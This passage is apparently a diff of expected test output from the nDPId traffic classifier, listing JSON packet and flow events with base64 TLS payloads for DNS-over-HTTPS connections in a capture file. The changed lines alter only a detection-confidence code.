00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739310588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":340,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":340,"pkt_l4_len":306,"thread_ts_msec":946739310588,"pkt":"REREREREZmZmZmZmCABFAAFGz7FAAL0GqFMKAAABp3LcfZKaAcWpCIgSh0x2XlAYAfZF5QAAFgMBARkBAAEVAwNM+6CQ4xrTV+1tOPP7h0Gj90S89M7DOPc8QQnDuq\/mRiD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACmAAAAFQATAAAQZG5zMS5kbnNjcnlwdC5jYQAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACDUjoSgwC\/YwRC2sL4\/9W3ATSzLtM\/v84EfifaAhQZfWw=="} 
-01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310588,"flow_last_seen":946739310588,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":286,"flow_tot_l4_payload_len":286,"flow_avg_l4_payload_len":286,"midstream":1,"thread_ts_msec":946739310588,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 04673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946739310697,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3154,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3154,"pkt_l4_len":3120,"thread_ts_msec":946739310697,"pkt":"ZmZmZmZmRERERERECABFAAxEyD9AADMGLsinctx9CgAAAQHFkpqHTHZeqQiJMFAYAfVQ4wAAFgMDAHoCAAB2AwOMlhGBzZbQdgMB7SlRRNR6aAHyhH11lUBOX85ujHC26yD0eC9rhNsSjRzwJJQFthL\/q1ufnITsbP94aSBdrdhzDxMBAAAuACsAAgMEADMAJAAdACBUUq246Yl+EWhWLEvZvcutMb+IirYuhEzXmLk3lr59QxQDAwABARcDAwAgZrqPXWP2zV85oWOqSEKZV0DzXUfiOwwJJ+C5CgZ1QqEXAwMKFVw16EKwmaYl6UqgM5FDRFEvQkVVdsBwborgCOxUvP2YbrJsHBMovDHHpAcBFTWebPQJMSKasadU094aHDRpLPrxxCjXB2pxM0WIqTvteHWIfU1Fk5\/NpqSuHKzO0Ra3PwdESYixe\/zb6sDdKKc1TRT99VsGnFNvwT\/9kRj6LGAVtWhnVsCfJH598qgWQ0wNsN5\/qg97535WjDSAoptbAHelOwuJgc8mZW87Z778lSdbGSJVYmbS+Kzpu3czloyo+k8tnMR0gAcl1hEQQ49kVF90oJqhnl11GE\/B0nhnrDcMC484Ni2gzPflOc2ve4l75Bv19quG6UuBjAJ+lAILT2sCAli3NgfXnu\/RIxYWHOwg5dkUsitPEbeddf7oCeQEhHZOIe8IWZHCTWJ8Xas6gq1DtDEctxSwxYTmBOPQYJURvi5XAJunxgkYorZ1S5H22PsJbPQoDTXE7jb\/MK+t+sJi\/qLBk\/QTcK+QjjpfOnPOG6kcTfb96PDiNmimFlhI+7qPbHOuBFKP3RlOfNCtE0LR80aRulQJ7mOKrhCqpMkFgCoXo\/4IvZulEfNa6rLjjxU0mGwRO9C\/8SUW\/MWxf9V+fhaFIFLLIrdk9mjlOAh4RTjBuIhZwdSm01OHFabvxJQc5nWUTI8sDv\/4Hth4Nmyyi395Zo\/bIgvPNsPA6YqSbJJPw7TRXj9EpeXABU58rfRMlnEHMcHSeAnr61+lHN29cf2rb7cQuEObxOV+r0Ti2hnTxG1kzZXxUKMf1TJz\/QNCPdFs\/8sc7I75BLceNNdyiMxbhvl0\/mQYkbbTX+E01I4nneSr0YAWi\/dj5OFWkY5oKdT3ijaj5ZnH8mUoUzF6gidtHrJfWLUutNNAVK0ii3hJTxAh53tLa55cziofBXUjER9OxqdXFQX0xk0dW5\/N25Am3sfN4K9G9Or+Mq0ZjCUN\/b\/4AAu5iVdc2xuiywbhKCKv\/+1ba649i2+11N2NuNP4WLerjRdmVgUEXTqjPsE1bvdPpgn\/tgD\/NfJO
4snitGVo2fF0AIvoI8ffNDBM8mHNAe\/P4wCN21PuNzrXMiMwd7BKvHy1yaV3bx1ZcbZVsRq2ArQ\/sz1xvbYIM5K\/4uE3U5TUD7iEvNa+H0F0t5Pm3xl9hPFjB8UQZyCzE0eaHFxztuY1AhJrANiSpn9KUApux28hlfmPpxZwwY\/4voaTDNDh4a6l1L\/5bBlTMZQ8ZTPo3KsCc7rYoLRgUBfec4EVT3pXIcfZwnttUMEultj1OSOdAYKMUVl+Ae797PlHj+BPOvQU1JP+1NxmeW9EkPxvKNxTuFB8Ql03lSa0sP7N4iOT4LxwTyM6btUOuFjsDMq5fFh3z8x6u4eDmVvymYi2lDSt123i5VnAGlmqe2vlBnBoLSjRbpHHKNWC14LFSfaclke+Fsk\/LXqRdmrmwoK42FR8QM5yBJ4V4XBtfp1iJayJWXrv2Yp\/Jw2nGI\/8spJXweIKBfFJYNDE+FKqYVx6uY0QURwmsxmAiNbUSW3iE5ptj6f47Bqqzcu614k3woIktKLvq+R5kAUl\/94OeFfc1MDcYQiS1itHZ6WgYMqXlALhkIaagT341vLWH8EINXXu\/JPbuL4ratmRZsOHcAq4Z64Qth7VsN\/NAOgVmBZa9WLc6jmBs+\/7oNewv6pYbinaC9eFjw+AUviDZIoPDTI2cqHtCKNJKtQeYF8JwZdso+kGs0e4hY6Ekh+Gt4QIAdcddPMJiEMdHRRcI7TJwLsTmixFKIFFEmFMcRnAgRce970vQl6+J2m\/3\/zT76RlKTnb6S5cA2Gh1xVWfifqZ+dJJ4S6U8o2kzOx1BcO4lPr6QndhbLXBopt+TnAxhiNVC0jGSLxxKfJsKliuCmauybike5VfhMB74\/Zd9LI0lHZcyjtrJZpkqIdf9mUmq84TeFEVObpfDxeDp9pwfwnzY7CZiAhc8H7X\/B4eL6QPbJJeDvWRsaiMa8MtOGUovwBK\/1RmmRbBs9Ps\/WvCegAP2zZsifFoeWn3IFAPuF2t4F1jzP6KFB2fJjiCF\/xSMUdVX4mSSLxUy6Noq6HH8DTkiTT7i5Rtb6Z+6YPqTrIz0kRUJm8ymK8qGaWvXbafgJW+zAD6LQJ6Uz\/H9ede+fQeVaNdwR2ZGANN93T8+CUOO\/5QCgVylxvI+WkULYljrgmsAHGf2x4K+AdzUNCRbtqqamvoa9+H9TZ6D9K0XHtu60WRh\/xvg+0kvul3oISkBwW\/5VC47CJIkeqDKIcaH28dzjF68bVaWHBCOA\/QVspO8f7PM39uibr2ZI\/9qT7jw8Z+41laurnLDDiiTcv8nIyk9gPkkLpL0gZ8B7RwNepdi9poakmfyvLsu7noykkUZPrrciaDs4AxlMW2SE0l6ggoSXHblXDfGv1qrkJ+wYHqoIpx4Orz9BIDwmFuIK9uApDePCMMJ8COMRLP5+c7CWBbef3qNt43feI9i3DxrqohnnAeDQ5XayaaeIrWeswn\/yTkRhpCGBJsg0rlCy0bwelKJ5jOd0Z6yAeLdgeBTN7mANe1L7262l3N\/TUj4BGdpkUJSKWZ+F5L9xh3ZDx0CN7nut3setCOi4jALV8qZWBwNBsnPw\/1et9Mhz5yQU5W4hKDkIkR0JbpteXZI\/YulIUs304N95S0rMRs+F91Z\/I1bjxYITEBnA3nKgeOqnJG67UQeyBJy3Wot3ZWs1FnfHSinzEDRXoy\/in3NMk3Ee4UJjJJVvh1u1kB0flpae3nwu8yHniwAQeA4V\/IYlytwzxmH9UBxClJ1YaCH4QYvYTNNn4X5yrgDRFy8aRZbx7KFTZjETXMAwD7jXdzFpBRNyur7a5hxwjkpR1nPJHXNHbl9ulhBQraPk64O22lXmWhmTqqJxPCHLTJc8dCW9Tw+MWIDqlSC6iP\/uFGWMugMNTbPpm71YwCV6DE3MM5Iw3r\/pJtSMpVM1czkfmhYfe8YtiZEI64Bh59v3JQ7Geu6i4Q2
THuBrvHiZucUzufDS6W\/DBGI9K4\/J9OjIx3bbp4KuEgDSz3alUQX8h9N3c6Ve\/ecJdJcy74VVi6oGyfaHP6IVk7S15X3oTFjfGBcG+hk0a0dR\/W0BGALH+pY8iH726JsGgeEg52jxxJyoyqN2BP+Onsb9VAjI4Axsa9MyFPMa6R4QE78VraMZsIMjQY2e6jOI2lFaIx1i29CS8IB7OY+l9i9GRSJhN1TC+qRidWiZdwiZ6CGxjzCAIjCNtYYMpt94CcLWARqfnvGVuwq7RqWOpW3L6qgDcGRhcwof3dXDPhz02YMhWNSauXVnUXZfqF8vmR+tgeJWIevQpdj5ioEIsT2Um5j+gijjHh859fJLDhzYVmYtQ3TEi737GfFw2SXnggL\/Iy07c7IZEI94AezYiyRdA9+kLWGaO\/dAL2rthXXz37bspZFnOGyuB0KI3G4RabCIXAwMBGcOMNM44BDplKj\/3Ojq4jdtuoD82NTa5b2k5zkFslQd12hFn3q5eB44nkwI465O8I9pSVocWpqU9EbYhTvyK1R8N4URD7Q5PMRg7Umy5tkS2hB9uZLmMl9DoKxlIW+kyr\/KuqeGrCAN583A5M1yhRuOwYF56CIKxvuyChPRKUAt8\/70gOTQjynH\/\/1nGoYgPF\/ta4eVsTLhuzDLb9mQMc16\/4VLa51E7HgIT9to4lg95nWvnMoIyp4a8sRcKKCYU92Ot4xWr0tqEIEu0fXIbk7\/Ta2loRt8FUwirJas4rlQGX1glaJy9RyPTHTwKV9kLdjGIRncOAxHu\/8Q7IfLg2aWJ07\/3naoyq6szJDQTcE3S8LB44P4jJ13NFwMDADUJ1y22teIy1dcIiwJwX4cS160nI55Nkh7bUzq2ftRXjrZxugVJnOhQTCokK54\/+GLzaYeqbw=="} -01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":74,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310588,"flow_last_seen":946739310697,"flow_idle_time":7580000,"flow_min_l4_payload_len":286,"flow_max_l4_payload_len":3100,"flow_tot_l4_payload_len":3386,"flow_avg_l4_payload_len":1693,"midstream":1,"thread_ts_msec":946739310697,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":37530,"dst_port":453,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns1.dnscrypt.ca","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946739310700,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":946739310700,"pkt":"REREREREZmZmZmZmCABFAABoz7NAAL0GqS8KAAABp3LcfZKaAcWpCIkwh0yCelAYAfVFBwAAFAMDAAEBFwMDADWIup5ey1m73Olzdr+La\/pgBsOV2156nE0gjo7pkVZbX+HWq3wNBOBZgTPS2Gv4V1H1NoVl6Q=="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739310980,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":946739310980,"pkt":"REREREREZmZmZmZmCABFAAFBYCBAAL0GW60KAAABuSuHAZUqAburhCguMeSlTVAYAfYCHQAAFgMBARQBAAEQAwM7gJo4OG7S+iUgpLXTuxo5Xw1OBGj4DiyxVBvpcTjrrSC1ygzgmnU02BGfASVXjVBWPNfoJIqu28ODMXbR4UvXGQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAChAAAAEAAOAAALb2R2ci5uaWMuY3oABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg+HQ6d2TRAhXiPlV4SzYTTgVvyRFR0ttaRH8caXLPDAE="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739310980,"flow_last_seen":946739310980,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":281,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":946739310980,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
04510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":946739311016,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":3057,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3057,"pkt_l4_len":3023,"thread_ts_msec":946739311016,"pkt":"ZmZmZmZmRERERERECABFAAvj5XlAADUGU7K5K4cBCgAAAQG7lSox5KVNq4QpR1AYAO0MvwAAFgMDAGICAABeAwOYp2uqwk2kagwv1bFvuG7BP4gwxFJK\/HnbYlDDBgxtByBtkhDnIYlAH5FeNvmtcy43X+awJKk1khM1gLQ9O4\/1KcAvAAAW\/wEAAQAACwAEAwABAgAQAAUAAwJoMhYDAwn0CwAJ8AAJ7QAFUTCCBU0wggQ1oAMCAQICEgOvzNhD6HsqkMaua9kU943O+TANBgkqhkiG9w0BAQsFADBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMwHhcNMjAwODAzMDY1MzUwWhcNMjAxMTAxMDY1MzUwWjAWMRQwEgYDVQQDEwtvZHZyLm5pYy5jejCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAMSBtMaoOIrrVwbIP2cWYEJHSXjqgj\/\/9tkWX5PXpNopleDTdQVoDYtrhgWWdCxKvyghVnCCvqzpAdxH9iHJ+YDCJvMhSONvyUnQC+8wqGClBPGGgWuYJiWCNGWLq05jQxU5OjFamZYLeA83J41w0hXJ0caGVgR+ZmGHFjjdBCJABPqlSZbx4n\/8eqoqwv3W6903WKQrR8zszV5MtKKlTANB6QP2yhXI+UhhzdoeLxrEImAA6gxL2BOHWdKuBhBuV+ph8YRaL5IiMHVdXgcmxhPMtLDMaXcrlQWC6XO\/mVYjsQjycz9NHwfX9HBGmqdB8EpxpqAzOMv4Pfea+srqI+sCAwEAAaOCAl8wggJbMA4GA1UdDwEB\/wQEAwIFoDAdBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDAYDVR0TAQH\/BAIwADAdBgNVHQ4EFgQUiF81uRjtpDLZWzD7gWIvMHk\/TcYwHwYDVR0jBBgwFoAUqEpqYwR93brm0Tm3pkVl7\/Oo7KEwbwYIKwYBBQUHAQEEYzBhMC4GCCsGAQUFBzABhiJodHRwOi8vb2NzcC5pbnQteDMubGV0c2VuY3J5cHQub3JnMC8GCCsGAQUFBzAChiNodHRwOi8vY2VydC5pbnQteDMubGV0c2VuY3J5cHQub3JnLzAWBgNVHREEDzANggtvZHZyLm5pYy5jejBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQMGCisGAQQB1nkCBAIEgfQEgfEA7wB2AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc7NP+yAAAAQDAEcwRQIhAKJu6NqRyIYQsDPHU\/A2REhgeKHjM4x+XnuUUYMuSVKBAiBvFXWETRjBcg4jaK4iYqlFL3MxxHaFAihU4M5Y1\/QWIQB1AAe3XBvlfWj\/8bDGHSMVx7rmV3xXlLdq7rxhOhpp06IcAAABc7NP+0kAAAQDAEYwRAIgbhSITS
EVzSp\/pS3dsOxVrCnCOPr0QsQS\/Z8OeZ0VJL4CIEqFJZjRYER6kq4HNRyZ4yzxaPbu\/njrCFn4rfkG\/MO7MA0GCSqGSIb3DQEBCwUAA4IBAQCGEOIQRUNcWjsX719Aj278yDJZeRktrpYQiEzTApT2VFFAVk9RNpDtIgove0nygMmo0gYcRhVp8veJjqVoyBOpTj8fBZ0k4jHFaDhaRBi5aQXOMln+cU\/N+ZZyxOF\/OvhfMIgmGnNpnX15fmj0DD6pQOeMMvjd9\/6LhaAOIYehc8T\/qnYYgS+NN4PGwZ62L8NBcloKk78UBZkehMmgkPB4R4UGWU+P\/9wBXoct8xHeSEI\/RKypAvQONIxcx+PGOfY7cug8EawYjQxeC0dBrCPA4HuTbflrjLpxCEjs2nsPD4SXJGGl7AoG4paGMGZjt4DcZO2jhWz5unIehkjqEM\/fAASWMIIEkjCCA3qgAwIBAgIQCgFBQgAAAVOFc2oLheynCDANBgkqhkiG9w0BAQsFADA\/MSQwIgYDVQQKExtEaWdpdGFsIFNpZ25hdHVyZSBUcnVzdCBDby4xFzAVBgNVBAMTDkRTVCBSb290IENBIFgzMB4XDTE2MDMxNzE2NDA0NloXDTIxMDMxNzE2NDA0NlowSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnNMM8FrlLke3cl03g7NoYzDq1zUmGSXhvb418XCSL7e4S0EFq6meNQhY7LEqxGiHC6PjdeTm86dicbp5gWAf15Gan\/PQeGdxyGkOlZHP\/uaZ6WA8SMx+yk13EiSdRxta67nsHjcAHJyse6cF6s5K671B5TaYucv9bTyWaN8jKkKQDIZ0Z8h\/pZq4UmEUEz9l6YKHy9v6Dlb2honzhT+Xhq+w3Brvaw2VFn3EK6BlspkENnWAa6xK8xuQSXgvopZPKiAlKQTGdMDQMc2PMTiVFrqoM7hD8bEfwzB\/onkxEz0tNvjj\/PIzark5McWvxI0NHWQWM6r6hCm21AvA2H3DkwIDAQABo4IBfTCCAXkwEgYDVR0TAQH\/BAgwBgEB\/wIBADAOBgNVHQ8BAf8EBAMCAYYwfwYIKwYBBQUHAQEEczBxMDIGCCsGAQUFBzABhiZodHRwOi8vaXNyZy50cnVzdGlkLm9jc3AuaWRlbnRydXN0LmNvbTA7BggrBgEFBQcwAoYvaHR0cDovL2FwcHMuaWRlbnRydXN0LmNvbS9yb290cy9kc3Ryb290Y2F4My5wN2MwHwYDVR0jBBgwFoAUxKexpHsscfrb4UuQdf\/EFWCFiRAwVAYDVR0gBE0wSzAIBgZngQwBAgEwPwYLKwYBBAGC3xMBAQEwMDAuBggrBgEFBQcCARYiaHR0cDovL2Nwcy5yb290LXgxLmxldHNlbmNyeXB0Lm9yZzA8BgNVHR8ENTAzMDGgL6AthitodHRwOi8vY3JsLmlkZW50cnVzdC5jb20vRFNUUk9PVENBWDNDUkwuY3JsMB0GA1UdDgQWBBSoSmpjBH3duubRObemRWXv86jsoTANBgkqhkiG9w0BAQsFAAOCAQEA3TPXEfNjWDjdGBX7CVW+dla5cEilaUcne8IkCJLxWh9KEik3JHRRHGJouM2VcGfl96S8TihRzZvoroed6ti6WqEBmtzw3Wodatg+VyOeph4EYpr\/1wXKtx8\/wApIvJSwtmVi4MFU5aMqrSDE6ea73Mj2tcMyo5jMd6jmeWUHK8so\/joWUoHOUgwuX4Po1QYz+3dszkDqMp4fklxBwXRsW10KXzPMTZ+sOPAveyxindmjkW8lGy+QsRlGPfZ+G6Z6h7mjem0Y+iWlkYcV4PIWL1iwBi8saCbGS5jN2p8M+X+
Q7UNKEkROb3N6KOqkqm57TH2H3eDJAkSnh6\/DNFu0QhYDAwFNDAABSQMAF0EE7OwduzycCFyh5foVYUYJfj2csLLoqbmNrs4ksDiqkMaHC2NulFxfST4jcCRZ19YEaLojL5JVRvlluRb8LA6yDQQBAQARbpzNdpCTfHNn9Bz14lNKRHZrsXa4X4EmfyVVEagU6WSCW5UKp3bMis8UAzosg4RFbcIE\/BqKgmQG64Bt\/cGitnxq47bonIC\/OFLylrM320R6R6uLkQuGNQpkUlgrZKL\/+YkYqd4ToLlZjenqQeguYlPWOUvDEduCfvOd+A9y2fcGuSyrbb0En99qwYiK1PUm11WXjEDQ91vzKm5Pz2wWWFYuywvRbHOtLetuqGEfMtz5QTTP+GA2fJf1SHhqAtT7v7XaP+5Wvee65IgIoNU6aiAVYz3hwW\/AkDmTqCcqZ608Q7A+R1MIFZgfnWqkxiaXPHcpFh\/8pcgjckhLtTiSFgMDAAQOAAAA"} -01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"odvr.nic.cz","server_names":"odvr.nic.cz","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=odvr.nic.cz","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"15:57:4E:06:5B:3D:23:22:EF:BC:2E:5B:A3:3E:A5:76:BD:14:01:4B"}} 
+01276{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739310980,"flow_last_seen":946739311016,"flow_idle_time":7580000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":3003,"flow_tot_l4_payload_len":3284,"flow_avg_l4_payload_len":1642,"midstream":1,"thread_ts_msec":946739311016,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.43.135.1","src_port":38186,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 